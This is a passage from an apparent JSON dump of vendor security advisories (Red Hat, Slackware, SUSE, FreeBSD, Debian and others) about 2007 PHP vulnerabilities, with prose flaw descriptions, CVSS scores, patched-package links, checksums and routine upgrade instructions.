effect.\r\n(CVE-2007-0907)\r\n\r\nSeveral flaws in PHP could allow attackers to \"clobber\" certain\r\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\r\n\r\nRed Hat would like to thank Stefan Esser for his help diagnosing these issues.", "modified": "2019-03-22T23:44:13", "published": "2007-02-22T05:00:00", "id": "RHSA-2007:0088", "href": "https://access.redhat.com/errata/RHSA-2007:0088", "type": "redhat", "title": "(RHSA-2007:0088) Important: php security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:45:53", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA number of buffer overflow flaws were found in the PHP session extension;\r\nthe str_replace() function; and the imap_mail_compose() function. If very\r\nlong strings were passed to the str_replace() function, an integer\r\noverflow could occur in memory allocation. If a script used the\r\nimap_mail_compose() function to create a new MIME message based on an\r\ninput body from an untrusted source, it could result in a heap overflow.\r\nAn attacker with access to a PHP application affected by any these issues\r\ncould trigger the flaws and possibly execute arbitrary code as the\r\n'apache' user. (CVE-2007-0906)\r\n\r\nWhen unserializing untrusted data on 64-bit platforms, the\r\nzend_hash_init() function could be forced into an infinite loop, consuming\r\nCPU resources for a limited time, until the script timeout alarm aborted\r\nexecution of the script. (CVE-2007-0988)\r\n\r\nIf the wddx extension was used to import WDDX data from an untrusted\r\nsource, certain WDDX input packets could expose a random portion of heap\r\nmemory. (CVE-2007-0908)\r\n\r\nIf the odbc_result_all() function was used to display data from a\r\ndatabase, and the database table contents were under an attacker's\r\ncontrol, a format string vulnerability was possible which could allow\r\narbitrary code execution. (CVE-2007-0909)\r\n\r\nA one byte memory read always occurs before the beginning of a buffer.\r\nThis could be triggered, for example, by any use of the header() function\r\nin a script. However it is unlikely that this would have any effect.\r\n(CVE-2007-0907)\r\n\r\nSeveral flaws in PHP could allow attackers to \"clobber\" certain\r\nsuper-global variables via unspecified vectors. (CVE-2007-0910)\r\n\r\nAn input validation bug allowed a remote attacker to trigger a denial of\r\nservice attack by submitting an input variable with a deeply-nested-array.\r\n(CVE-2007-1285)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.", "modified": "2017-09-08T12:11:11", "published": "2007-03-13T04:00:00", "id": "RHSA-2007:0082", "href": "https://access.redhat.com/errata/RHSA-2007:0082", "type": "redhat", "title": "(RHSA-2007:0082) Important: php security update", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}, {"lastseen": "2019-08-13T18:46:00", "bulletinFamily": "unix", "description": "PHP is an HTML-embedded scripting language commonly used with the Apache\r\nHTTP Web server. \r\n\r\nA denial of service flaw was found in the way PHP processed a deeply nested\r\narray. A remote attacker could cause the PHP interpreter to crash by\r\nsubmitting an input variable with a deeply nested array. (CVE-2007-1285)\r\n\r\nA flaw was found in the way PHP's unserialize() function processes data. If\r\na remote attacker is able to pass arbitrary data to PHP's unserialize()\r\nfunction, it may be possible for them to execute arbitrary code as the\r\napache user. (CVE-2007-1286)\r\n\r\nA double free flaw was found in PHP's session_decode() function. If a\r\nremote attacker is able to pass arbitrary data to PHP's session_decode()\r\nfunction, it may be possible for them to execute arbitrary code as the\r\napache user. (CVE-2007-1711)\r\n\r\nUsers of PHP should upgrade to these updated packages which contain\r\nbackported patches to correct these issues.", "modified": "2018-03-14T19:27:09", "published": "2007-04-16T04:00:00", "id": "RHSA-2007:0154", "href": "https://access.redhat.com/errata/RHSA-2007:0154", "type": "redhat", "title": "(RHSA-2007:0154) Important: php security update", "cvss": {"score": 6.8, "vector": "AV:N/AC:M/Au:N/C:P/I:P/A:P"}}], "slackware": [{"lastseen": "2019-05-30T07:37:11", "bulletinFamily": "unix", "description": "New php packages are available for Slackware 10.2 and 11.0 to improve the\nstability and security of PHP. Quite a few bugs were fixed -- please\nsee http://www.php.net for a detailed list. All sites that use PHP are\nencouraged to upgrade. Please note that we haven't tested all PHP\napplications for backwards compatibility with this new upgrade, so you\nshould have the old package on hand just in case.\n\nBoth PHP 4.4.5 and PHP 5.2.1 updates have been provided.\n\nSome of these issues have been assigned CVE numbers and may be referenced\nin the Common Vulnerabilities and Exposures (CVE) database:\n\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0906\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0907\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0908\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0909\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0910\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0988\n\n\nHere are the details from the Slackware 11.0 ChangeLog:\n\npatches/packages/php-4.4.5-i486-1_slack11.0.tgz:\n Upgraded to php-4.4.5 which improves stability and security.\n For complete details, see http://www.php.net.\n For imformation about some of the security fixes, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0906\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0907\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0908\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0909\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0910\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0988\n (* Security fix *)\nextra/php5/php-5.2.1-i486-1_slack11.0.tgz:\n Upgraded to php-5.2.1 which improves stability and security.\n For imformation about some of the security fixes, see:\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0906\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0907\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0908\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0909\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0910\n http://cve.mitre.org/cgi-bin/cvename.cgi?name=CVE-2007-0988\n (* Security fix *)\n\nWhere to find the new packages:\n\nHINT: Getting slow download speeds from ftp.slackware.com?\nGive slackware.osuosl.org a try. This is another primary FTP site\nfor Slackware that can be considerably faster than downloading\nfrom ftp.slackware.com.\n\nThanks to the friendly folks at the OSU Open Source Lab\n(http://osuosl.org) for donating additional FTP and rsync hosting\nto the Slackware project! :-)\n\nAlso see the &quot;Get Slack&quot; section on http://slackware.com for\nadditional mirror sites near you.\n\nUpdated packages for Slackware 10.2:\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/patches/packages/php-4.4.5-i486-1_slack10.2.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-10.2/testing/packages/php-5.2.1/php-5.2.1-i486-1_slack10.2.tgz\n\nUpdated packages for Slackware 11.0:\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/patches/packages/php-4.4.5-i486-1_slack11.0.tgz\nftp://ftp.slackware.com/pub/slackware/slackware-11.0/extra/php5/php-5.2.1-i486-1_slack11.0.tgz\n\n\nMD5 signatures:\n\nSlackware 10.2 packages:\n9910a0b1e46d10583b6d2f6588e13457 php-4.4.5-i486-1_slack10.2.tgz\n6f4eb9e2bb286cb33bf8f450e458025e php-5.2.1-i486-1_slack10.2.tgz\n\nSlackware 11.0 packages:\n4e312abf50feeedfe50a1fcddbd4cb2a php-4.4.5-i486-1_slack11.0.tgz\nbe96edf4afb6b554b22df5f30a8d2b9b php-5.2.1-i486-1_slack11.0.tgz\n\n\nInstallation instructions:\n\nFirst, stop apache:\n > apachectl stop\n\nNext, upgrade to the new PHP package:\n > upgradepkg php-4.4.5-i486-1_slack11.0.tgz\n\nFinally, restart apache:\n > apachectl start (or: apachectl startssl)", "modified": "2007-02-22T23:28:01", "published": "2007-02-22T23:28:01", "id": "SSA-2007-053-01", "href": "http://www.slackware.com/security/viewer.php?l=slackware-security&y=2007&m=slackware-security.535756", "title": "php", "type": "slackware", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "securityvulns": [{"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "Multiple buffer overflows, DoS conditions, information leaks, etc.", "modified": "2007-02-15T00:00:00", "published": "2007-02-15T00:00:00", "id": "SECURITYVULNS:VULN:7248", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7248", "title": "Multiple PHP vulnerabilities", "type": "securityvulns", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:23", "bulletinFamily": "software", "description": "Infinite loop on 64-bit platforms.", "modified": "2007-03-02T00:00:00", "published": "2007-03-02T00:00:00", "id": "SECURITYVULNS:VULN:7279", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7279", "title": "PHP zend_hash_init function infinite loop", "type": "securityvulns", "cvss": {"score": 5.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:NONE/I:NONE/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:25", "bulletinFamily": "software", "description": "Buffer overflow on oversized MIME boundary.", "modified": "2007-04-08T00:00:00", "published": "2007-04-08T00:00:00", "id": "SECURITYVULNS:VULN:7547", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7547", "title": "PHP imap_mail_compose buffer overflow", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}, {"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "Fragment of heap memory may be red because of missed variable length checking.", "modified": "2007-03-06T00:00:00", "published": "2007-03-06T00:00:00", "id": "SECURITYVULNS:VULN:7355", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7355", "title": "PHP php_binary / WDDX information leak", "type": "securityvulns", "cvss": {"score": 7.6, "vector": "AV:NETWORK/AC:HIGH/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2018-08-31T11:09:24", "bulletinFamily": "software", "description": "There is no access counters for _SESSION and HTTP_SESSION_VARS variables, making it possible to trigger use-after-free conditions by unsetting these variables. In addition, it&#39;s possible to deserealize these variables.", "modified": "2007-03-25T00:00:00", "published": "2007-03-25T00:00:00", "id": "SECURITYVULNS:VULN:7473", "href": "https://vulners.com/securityvulns/SECURITYVULNS:VULN:7473", "title": "PHP variables unset use after free vulnerability", "type": "securityvulns", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "suse": [{"lastseen": "2016-09-04T12:08:20", "bulletinFamily": "unix", "description": "Multiple bugs have been fixed in the PHP4 and PHP5 script interpreters.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2007-03-15T12:12:23", "published": "2007-03-15T12:12:23", "id": "SUSE-SA:2007:020", "href": "http://lists.opensuse.org/opensuse-security-announce/2007-03/msg00010.html", "type": "suse", "title": "remote code execution in php4,php5", "cvss": {"score": 10.0, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:COMPLETE/I:COMPLETE/A:COMPLETE/"}}, {"lastseen": "2016-09-04T12:22:53", "bulletinFamily": "unix", "description": "The scripting language implementations PHP4 and PHP5 have been updated to fix several security issues.\n#### Solution\nThere is no known workaround, please install the update packages.", "modified": "2007-07-12T16:26:43", "published": "2007-07-12T16:26:43", "id": "SUSE-SA:2007:044", "href": "http://lists.opensuse.org/opensuse-security-announce/2007-07/msg00006.html", "type": "suse", "title": "remote denial of service in php4,php5", "cvss": {"score": 7.5, "vector": "AV:NETWORK/AC:LOW/Au:NONE/C:PARTIAL/I:PARTIAL/A:PARTIAL/"}}], "freebsd": [{"lastseen": "2019-05-29T18:34:37", "bulletinFamily": "unix", "description": "\nMultiple vulnerabilities have been found in PHP, including:\n\t buffer overflows, stack overflows, format string, and\n\t information disclosure vulnerabilities.\nThe session extension contained safe_mode and\n\t open_basedir bypasses, but the FreeBSD Security\n\t Officer does not consider these real security\n\t vulnerabilities, since safe_mode and\n\t open_basedir are insecure by design and should\n\t not be relied upon.\n", "modified": "2013-04-01T00:00:00", "published": "2007-02-09T00:00:00", "id": "7FCF1727-BE71-11DB-B2EC-000C6EC775D9", "href": "https://vuxml.freebsd.org/freebsd/7fcf1727-be71-11db-b2ec-000c6ec775d9.html", "title": "php -- multiple vulnerabilities", "type": "freebsd", "cvss": {"score": 10.0, "vector": "AV:N/AC:L/Au:N/C:C/I:C/A:C"}}], "debian": [{"lastseen": "2019-05-30T02:22:05", "bulletinFamily": "unix", "description": "- --------------------------------------------------------------------------\nDebian Security Advisory DSA 1264-1 security@debian.org\nhttp://www.debian.org/security/ Moritz Muehlenhoff\nMarch 7th, 2007 http://www.debian.org/security/faq\n- --------------------------------------------------------------------------\n\nPackage : php4\nVulnerability : several\nProblem-Type : remote\nDebian-specific: no\nCVE ID : CVE-2007-0906 CVE-2007-0907 CVE-2006-0908 CVE-2007-0909 CVE-2007-0910 CVE-2007-0988\n\nSeveral remote vulnerabilities have been discovered in PHP, a server-side,\nHTML-embedded scripting language, which may lead to the execution of\narbitrary code. The Common Vulnerabilities and Exposures project identifies\nthe following problems:\n\nCVE-2007-0906\n\n It was discovered that an integer overflow in the str_replace()\n function could lead to the execution of arbitrary code.\n\nCVE-2007-0907\n\n It was discovered that a buffer underflow in the sapi_header_op()\n function could crash the PHP interpreter.\n\nCVE-2007-0908\n\n Stefan Esser discovered that a programming error in the wddx\n extension allows information disclosure.\n\nCVE-2007-0909\n\n It was discovered that a format string vulnerability in the\n odbc_result_all() functions allows the execution of arbitrary code.\n\nCVE-2007-0910\n\n It was discovered that super-global variables could be overwritten\n with session data.\n\nCVE-2007-0988\n\n Stefan Esser discovered that the zend_hash_init() function could\n be tricked into an endless loop, allowing denial of service through\n resource consumption until a timeout is triggered.\n\nFor the stable distribution (sarge) these problems have been fixed in\nversion 4:4.3.10-19.\n\nFor the unstable distribution (sid) these problems have been fixed in\nversion 6:4.4.4-9 of php4 and version 5.2.0-9 of php5.\n\nWe recommend that you upgrade your php4 packages.\n\n\nUpgrade Instructions\n- --------------------\n\nwget url\n will fetch the file for you\ndpkg -i file.deb\n will install the referenced file.\n\nIf you are using the apt-get package manager, use the line for\nsources.list as given below:\n\napt-get update\n will update the internal database\napt-get upgrade\n will install corrected packages\n\nYou may use an automated update by adding the resources from the\nfooter to the proper configuration.\n\n\nDebian GNU/Linux 3.1 alias sarge\n- --------------------------------\n\n Source archives:\n\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-19.dsc\n Size/MD5 checksum: 1686 65acb80d308f7625e8ec91bb6e29eb29\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-19.diff.gz\n Size/MD5 checksum: 283658 c7c1e0ce432510ed48cd9e135a21a59e\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10.orig.tar.gz\n Size/MD5 checksum: 4892209 73f5d1f42e34efa534a09c6091b5a21e\n\n Architecture independent components:\n\n http://security.debian.org/pool/updates/main/p/php4/php4-pear_4.3.10-19_all.deb\n Size/MD5 checksum: 250024 8005785eca558044984ca6a66019c02f\n http://security.debian.org/pool/updates/main/p/php4/php4_4.3.10-19_all.deb\n Size/MD5 checksum: 1142 bd2113b4fc760a9e2d81f67ccf24fcac\n\n Alpha architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_alpha.deb\n Size/MD5 checksum: 1701456 14d35e1ca06e0a4339b1b8c885a6bd8f\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_alpha.deb\n Size/MD5 checksum: 1699180 4e630e589b36cf5143c772802ef4bafc\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_alpha.deb\n Size/MD5 checksum: 3466040 56e187c9cabb148b5681074f2ebcf6d2\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_alpha.deb\n Size/MD5 checksum: 1743378 4251694e892c47e59dad839e9ab7a2bc\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_alpha.deb\n Size/MD5 checksum: 168220 6595a46953cfa5156cc9dfbebfb57238\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_alpha.deb\n Size/MD5 checksum: 18148 9944bd006a811a68280d58707dba0fca\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_alpha.deb\n Size/MD5 checksum: 325162 3bf569109326bf57a6db0908864d7d4f\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_alpha.deb\n Size/MD5 checksum: 39036 0c174134c0af3da2a44471e0b6a0c0d9\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_alpha.deb\n Size/MD5 checksum: 34546 12b9ead7e3d2bc3d586db7c639b25a71\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_alpha.deb\n Size/MD5 checksum: 38140 f600d5a57454eac81a59614e396d0a7e\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_alpha.deb\n Size/MD5 checksum: 21370 4bc085128a86ebe0b5aff3f33c6b85a5\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_alpha.deb\n Size/MD5 checksum: 18206 00041519f22ba5528a61384a1cd8ff25\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_alpha.deb\n Size/MD5 checksum: 8340 5faa2f4f4dcc1e6d691fb4e514be1206\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_alpha.deb\n Size/MD5 checksum: 22454 8b815228a909700fecf5bc08301605b6\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_alpha.deb\n Size/MD5 checksum: 28368 230200935d5b2fe06fc6d01abcf36dc6\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_alpha.deb\n Size/MD5 checksum: 7964 a6b4bbd2b60752668b3556cdcbafbf78\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_alpha.deb\n Size/MD5 checksum: 13770 76441138f5d1bed6c02f43c5a2c55f0c\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_alpha.deb\n Size/MD5 checksum: 23304 d7802126ab8dde4842a72fca318e0424\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_alpha.deb\n Size/MD5 checksum: 17886 f341be585bc1342cc87cf814283dc826\n\n AMD64 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_amd64.deb\n Size/MD5 checksum: 1660864 6e8eea11106fd4b06d5d52ab41671003\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_amd64.deb\n Size/MD5 checksum: 1658212 e874bb3b60124b4e32732e9b3988c47a\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_amd64.deb\n Size/MD5 checksum: 3278508 aac0f56842fe12b91dc7acab71f1be03\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_amd64.deb\n Size/MD5 checksum: 1648682 51d7e77dba0ed241fa4bd60f110bcc69\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_amd64.deb\n Size/MD5 checksum: 168202 11bf04caba233142536151ff0decf329\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_amd64.deb\n Size/MD5 checksum: 17830 6079814a18fab1b42068de9fd1d35a29\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_amd64.deb\n Size/MD5 checksum: 325184 9c48363c84aa56f9020d83cef98d8b75\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_amd64.deb\n Size/MD5 checksum: 40800 d7ac88bc6c813a747c8ae14681605b35\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_amd64.deb\n Size/MD5 checksum: 34280 3b1eb57caa289d1c776f66d6734dee39\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_amd64.deb\n Size/MD5 checksum: 37726 014109aa721508ef8b6825e5e9744fac\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_amd64.deb\n Size/MD5 checksum: 21416 6b2bf18f6d6db5ee5bf57199639e9870\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_amd64.deb\n Size/MD5 checksum: 18886 01b618565ddfce919b8fffba1b336fad\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_amd64.deb\n Size/MD5 checksum: 8248 8e56bda6cd19f62248eba36057f9c381\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_amd64.deb\n Size/MD5 checksum: 22892 6789a85586205f00dd35f396012d437f\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_amd64.deb\n Size/MD5 checksum: 28786 87c5652813f3fc2e636d0de7c6504585\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_amd64.deb\n Size/MD5 checksum: 7918 c672b5d5a0dcc8ec56ae29b866909ee7\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_amd64.deb\n Size/MD5 checksum: 13684 7996ac194aad7b71aca2ce125f3fe53a\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_amd64.deb\n Size/MD5 checksum: 22444 fba5d84d8727dc342a4613cb4f0e5fca\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_amd64.deb\n Size/MD5 checksum: 17576 182a9c583741056b4f903071066aa777\n\n ARM architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_arm.deb\n Size/MD5 checksum: 1592392 e6c3e603f4b01b8b6472a01fa5c8b149\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_arm.deb\n Size/MD5 checksum: 1591960 42fc42a21fafe9980b1cbbd1450b6ebe\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_arm.deb\n Size/MD5 checksum: 3172326 44e7b476a2e1f1d6a8a3515aa407dddb\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_arm.deb\n Size/MD5 checksum: 1593200 0b02299dad2f9a76ee4e11f2d1aba8f1\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_arm.deb\n Size/MD5 checksum: 168244 f3c5d8aa86020ded4056f329cb005fe4\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_arm.deb\n Size/MD5 checksum: 17652 459d0f476feee2720542be633d56a92b\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_arm.deb\n Size/MD5 checksum: 325472 a741698e463184d3b278412189c9c1c2\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_arm.deb\n Size/MD5 checksum: 36114 5de247081d931105d8dfcad25dead156\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_arm.deb\n Size/MD5 checksum: 31782 8581635d5ffcb20066ad8a17742bf27e\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_arm.deb\n Size/MD5 checksum: 35462 da35a74bd0d0db3f7488860e19cfa79d\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_arm.deb\n Size/MD5 checksum: 19736 9be69fb529fcf733a91ac24b024a9958\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_arm.deb\n Size/MD5 checksum: 17086 5e372f2c55c6db64733458342fd27952\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_arm.deb\n Size/MD5 checksum: 7826 6b2e87408132edfc496475409128f949\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_arm.deb\n Size/MD5 checksum: 20600 cfad055dec9f682724478910247d974e\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_arm.deb\n Size/MD5 checksum: 27330 5c1904d04e7f81349b2d78e1cb7abe3b\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_arm.deb\n Size/MD5 checksum: 7644 d6ce09f4c247eb1a69965bc90836df81\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_arm.deb\n Size/MD5 checksum: 12790 31d406e601ca65bfc8a2779d0e7cebb4\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_arm.deb\n Size/MD5 checksum: 20892 822c073cb45186c6d872afdef513bc90\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_arm.deb\n Size/MD5 checksum: 15792 169a0517a14c792e870fcf1b94192276\n\n HP Precision architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_hppa.deb\n Size/MD5 checksum: 1759810 d97fae3b1a080a942653878c82cd3ffa\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_hppa.deb\n Size/MD5 checksum: 1757570 5c77a078ff8b20ea0402b4a904e0232b\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_hppa.deb\n Size/MD5 checksum: 3427812 03e08da005f5f97a6ecd7ab60b5ce68c\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_hppa.deb\n Size/MD5 checksum: 1719506 0d0b5c78f2493fa4911db750d517998a\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_hppa.deb\n Size/MD5 checksum: 168222 7370b1318dc8c75d7008c255b2002f6a\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_hppa.deb\n Size/MD5 checksum: 20028 45464c08d59854305c4a5c9f490d9a63\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_hppa.deb\n Size/MD5 checksum: 325312 ecccda98a727a5eaf06a0f0b17185cce\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_hppa.deb\n Size/MD5 checksum: 42104 40d2342dcc42b48485573952cffc03f7\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_hppa.deb\n Size/MD5 checksum: 37340 88ff9b02b36a7a1c9c2fce8056ef6f15\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_hppa.deb\n Size/MD5 checksum: 42648 8f1169758d56f94f0c92142be87d6be0\n http://security.debian.org/pool/updates/main/p/php4/php4-ldap_4.3.10-19_hppa.deb\n Size/MD5 checksum: 23000 12fa26227ed747fa3af3ad9efeb8d504\n http://security.debian.org/pool/updates/main/p/php4/php4-mcal_4.3.10-19_hppa.deb\n Size/MD5 checksum: 19908 560ad81c6f6db1820c6c572f67cd8152\n http://security.debian.org/pool/updates/main/p/php4/php4-mhash_4.3.10-19_hppa.deb\n Size/MD5 checksum: 8698 0656ad921535945f456fb480cc80743f\n http://security.debian.org/pool/updates/main/p/php4/php4-mysql_4.3.10-19_hppa.deb\n Size/MD5 checksum: 23596 2fae2e9262934c47965416824c08943b\n http://security.debian.org/pool/updates/main/p/php4/php4-odbc_4.3.10-19_hppa.deb\n Size/MD5 checksum: 30172 d2aaabd18fe095a8e106e20505f03ef2\n http://security.debian.org/pool/updates/main/p/php4/php4-recode_4.3.10-19_hppa.deb\n Size/MD5 checksum: 8340 5f2d0de885c904fec8a775afc40b6334\n http://security.debian.org/pool/updates/main/p/php4/php4-snmp_4.3.10-19_hppa.deb\n Size/MD5 checksum: 14562 e5dd41449a0e1b35188c7b1946610862\n http://security.debian.org/pool/updates/main/p/php4/php4-sybase_4.3.10-19_hppa.deb\n Size/MD5 checksum: 24124 786abb1633ebf48ab459f4e96656efba\n http://security.debian.org/pool/updates/main/p/php4/php4-xslt_4.3.10-19_hppa.deb\n Size/MD5 checksum: 18650 afab0398769e8c50b934ee221ea50a5a\n\n Intel IA-32 architecture:\n\n http://security.debian.org/pool/updates/main/p/php4/libapache-mod-php4_4.3.10-19_i386.deb\n Size/MD5 checksum: 1614182 612dd25787db4bba5c0b54006c02d50b\n http://security.debian.org/pool/updates/main/p/php4/libapache2-mod-php4_4.3.10-19_i386.deb\n Size/MD5 checksum: 1612058 9a67d7f1a9aade4bb3eed6b392077bf9\n http://security.debian.org/pool/updates/main/p/php4/php4-cgi_4.3.10-19_i386.deb\n Size/MD5 checksum: 3209228 5ac98a8a5649ea2ae6588c4e460ec90c\n http://security.debian.org/pool/updates/main/p/php4/php4-cli_4.3.10-19_i386.deb\n Size/MD5 checksum: 1609646 ec3d17f2b3024ef5ed6e8b21c4286b26\n http://security.debian.org/pool/updates/main/p/php4/php4-common_4.3.10-19_i386.deb\n Size/MD5 checksum: 168222 9ab456c6fe0ed13f2e591f88a26f81d6\n http://security.debian.org/pool/updates/main/p/php4/php4-curl_4.3.10-19_i386.deb\n Size/MD5 checksum: 17892 92d2e8793dfca9be7576624beb4b0005\n http://security.debian.org/pool/updates/main/p/php4/php4-dev_4.3.10-19_i386.deb\n Size/MD5 checksum: 325192 1a382f30b8ece263b027cfcc35ecfe9c\n http://security.debian.org/pool/updates/main/p/php4/php4-domxml_4.3.10-19_i386.deb\n Size/MD5 checksum: 37228 317fd23c3687d861b8b4789c1ea381d1\n http://security.debian.org/pool/updates/main/p/php4/php4-gd_4.3.10-19_i386.deb\n Size/MD5 checksum: 32384 d0655edb839dae2fa8ce269c84e91500\n http://security.debian.org/pool/updates/main/p/php4/php4-imap_4.3.10-19_i386.deb\n Size/MD5 checksum: 37402 95a94b237e75a4c1a64bcb592b351498\n 